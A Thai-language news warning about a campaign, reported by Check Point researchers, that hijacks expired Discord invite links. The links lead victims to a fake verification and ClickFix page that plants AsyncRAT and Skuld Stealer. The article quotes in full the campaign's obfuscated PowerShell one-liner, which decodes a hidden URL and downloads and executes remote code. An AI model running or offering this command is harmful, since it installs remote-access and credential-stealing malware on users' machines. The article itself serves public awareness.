เตือนวัยรุ่น! ระวังลิงก์ Invite Discord ปลอม เผลอกดแล้วหลงเชื่อคำสั่ง ติดมัลแวร์แน่นอน

Discord นั้นเป็นบริการแอปพลิเคชันแชทที่ได้รับความนิยมในหมู่วัยรุ่น และเกมเมอร์เป็นอย่างมากในปัจจุบัน และนั่นก็ทำให้เป็นอีกหนึ่งแหล่งที่แฮกเกอร์มักเข้ามาแฝงตัว หรือใช้แอบอ้างในการเล่นงานเหยื่ออีกด้วย

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญใหม่ของแฮกเกอร์ที่อาศัยช่องโหว่ของระบบเชื้อเชิญ (Invitation) ของแอปพลิเคชันแชท Discord ในการแพร่กระจายมัลแวร์ โดยช่องโหว่ดังกล่าวนั้นเปิดโอกาสให้แฮกเกอร์สามารถดัดแปลงลิงก์เชื้อเชิญ (Invite Links) ที่หมดอายุ ที่เมื่อเหยื่อหลงเชื่อกดไป แทนที่จะนำพาเหยื่อมายัง Discord กลับกลายเป็นพาเหยื่อไปยังเว็บไซต์อื่น (Redirect) ที่แฮกเกอร์ทำการวางมัลแวร์ไว้แทน

การตรวจพบแคมเปญดังกล่าวนั้นเป็นฝีมือของทีมวิจัยจาก Check Point บริษัทผู้เชี่ยวชาญด้านการพัฒนาซอฟต์แวร์ด้านความปลอดภัยไซเบอร์ ในส่วนขั้นตอนการโจมตีนั้นทางทีมวิจัยจะอธิบายว่า เริ่มต้นนั้นทางแฮกเกอร์จะทำการดัดแปลง Invite Link โดยช่องโหว่ของเซิร์ฟเวอร์ Discord ที่มีการเช่าใช้ (Subscription) Level 3 Boost ของ Discord ซึ่งทำให้ผู้ใช้งานนั้นมีสิทธิ์ในการดัดแปลง (Custom) Invite Link แต่ช่องโหว่จะเกิดขึ้นมาเมื่อการ Subscription ของเซิร์ฟเวอร์ดังกล่าวนั้นหมดอายุลง หรือตัวลิงก์ดังกล่าวหมดอายุลงชั่วคราว จะเปิดช่องให้แฮกเกอร์เข้าใช้งานรหัสเชิญชวน (Invitation Code) ที่หมดอายุนั้น มาดัดแปลงให้สามารถ Redirect ไปยังเซิร์ฟเวอร์เก็บมัลแวร์ของตนได้

ภาพจาก: https://cybersecuritynews.com/threat-actors-exploiting-expired-discord-invite-links/

โดยตัวลิงก์นั้นเมื่อลิงก์ถูกกดโดยเหยื่อ ก็จะเป็นการนำพาเหยื่อไปยังหน้าเพจที่ถูกฝังสคริปท์แบบ ClickFix (สคริปท์ที่จะขึ้นหน้าจอหลอกให้เหยื่อทำตามคำสั่งโดยอ้างว่าเป็นการทำเพื่อจัดการกับข้อผิดพลาดที่เกิดขึ้น แท้จริงแล้วเป็นการหลอกให้เหยื่อทำการรันสคริปท์ดาวน์โหลดและติดตั้งมัลแวร์) ซึ่งสำหรับแคมเปญนี้จะเป็นการหลอกลวงเหยื่อว่ากำลังเข้าสู่ขั้นตอนของการยืนยันตัวตน (Verification) โดยบอทรักษาความปลอดภัยที่มีชื่อว่า “Safeguard” หลังจากที่เหยื่อคลิ๊กปุ่มยืนยันตัวตนแล้ว ตัวเพจจะนำพาเหยื่อไปยังเพจที่อยู่นอกเซิร์ฟเวอร์ของ Discord ซึ่งเป็นเว็บไซต์สำหรับการทำ Phishing โดยเฉพาะที่มี URL ว่า captchaguard[.]me โดยหน้าจอของเพจจะมีการแสดง Google Captcha (ปลอม) ขึ้นมา แต่จะเป็นการแสดงแบบหลอกว่าโหลดตัว Capthca ไม่สำเร็จ ขอให้เหยื่อทำการยืนยันตัวตนแบบ Manual ซึ่งในจังหวะนี้ตัว JavaScript ที่ซ่อนอยู่ก็จะทำการคัดลอกคำสั่ง PowerShell สำหรับการดาวน์โหลดและรันมัลแวร์ไว้ใน Clipboard โดยตัวสคริปท์ PowerShell นั้นจะมีลักษณะดังนี้

powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));iex (iwr -Uri $url)"

ทางทีมวิจัยได้กล่าวว่า ตัวสคริปท์ดังกล่าวนั้นมีการแสดงคุณลักษณะว่าถูกเข้ารหัสไว้ในรูปแบบ Based-64 เพื่อตีรวนระบบตรวจสอบ (Obfuscation) ของ Pastebin URL หลังจากที่ตัวสคริปท์ถูกวางบน Clipboard เป็นที่สำเร็จแล้ว คำสั่งบนหน้าจอที่สั่งเหยื่อให้ทำตามก็จะคล้ายคลึงกับแคมเปญ Clickfix ตัวอื่น นั่นคือ คำสั่งจะสั่งให้เหยื่อเปิดฟีเจอร์ Run ของ Windows ขึ้นมา, จากนั้นทำการกดปุ่ม Ctrl-V เพื่อวางสคริปท์ แล้วกด Enter ซึ่งจะนำไปสู่การดาวน์โหลดมัลแวร์นกต่อที่ทำหน้าที่ในการฝ่าระบบป้องกันบนเครื่องของเหยื่อ และดาวน์โหลดมัลแวร์ตัวจริง (Payload) ลงมาถึง 2 ชนิด นั่นคือ มัลแวร์แบบเข้าถึงระบบเหยื่อจากทางไกล (Remote Access Trojan หรือ RAT) ที่มีชื่อว่า AsyncRAT และ มัลแวร์ประเภทขโมยข้อมูลของเหยื่อ (Infostealer) ที่มีชื่อว่า Skuld Stealer โดยอย่างหลังจะมุ่งเน้นไปในการขโมยเงินจากกระเป๋าคริปโตเคอร์เรนซีของเหยื่อ

ทีมวิจัยยังได้เปิดเผยอีกว่า ปัจจุบันมีผู้ตกเป็นเหยื่อแคมเปญดังกล่าวอยู่ประมาณ 1,300 ราย จากหลากประเทศ ไม่ว่าจะเป็น สหรัฐอเมริกา, เวียดนาม, สหราชอาณาจักร, ฝรั่งเศส, และ เยอรมนี ซึ่งถึงแม้จะเป็นจำนวนที่ดูไม่มาก แต่ก็แสดงให้เห็นถึงว่า การแพร่กระจายของตัวแคมเปญนั้นไม่ได้จำกัดอยู่ในประเทศใด หรือ ภูมิภาคใดภูมิภาคหนึ่งเท่านั้น ดังนั้น ขอให้ผู้อ่านมีความระมัดระวังในการเล่น หรือ รับลิงก์เชิญของ Discord จากคนแปลกหน้า